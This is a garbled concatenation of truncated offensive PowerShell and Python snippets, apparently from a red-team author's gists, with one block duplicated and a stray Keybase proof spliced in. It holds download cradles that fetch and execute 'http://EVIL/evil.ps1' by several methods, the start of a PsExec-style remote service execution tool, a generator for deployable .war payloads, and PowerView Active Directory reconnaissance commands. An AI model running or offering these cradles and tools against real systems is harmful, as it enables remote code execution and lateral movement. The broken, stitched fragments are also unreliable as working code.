# these functions allow you to enumerate, add, and remove alternate data streams
# it can function as a bootleg replacement for Sysinternals' streams.exe
function Find-Streams {
<#
.SYNOPSIS
Enumerates all alternate data streams for a specified path.
If no path is provided, the current path is used.
Author: @harmj0y
License: BSD 3-Clause
### Keybase proof
I hereby claim:
* I am harmj0y on github.
* I am harmj0y (https://keybase.io/harmj0y) on keybase.
* I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4 383A FA2F 9AA5 3110 89D3
To claim this, I am signing this object:
Function Invoke-LockWorkStation {
# region define P/Invoke types dynamically
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
# thanks matt and chris :)
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
function Invoke-LockWorkStation {
# region define P/Invoke types dynamically
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
# thanks matt and chris :)
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
#!/usr/bin/python
from impacket import smbserver
import sys, argparse, threading, ConfigParser, time, os
class ThreadedSMBServer(threading.Thread):
"""
Threaded SMB server that can be spun up locally.
"""
function Invoke-PsExec {
<#
.SYNOPSIS
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/runs a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
#!/usr/bin/python
# Code that quickly generates a deployable .war for a PowerShell one-liner
import zipfile
import StringIO
import sys
def generatePsWar(psCmd, appName):
function Translate-Canonical {
<#
.SYNOPSIS
Converts a user@fqdn to NT4 format.
.LINK
http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
#>
[CmdletBinding()]
param(
[String]$User
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server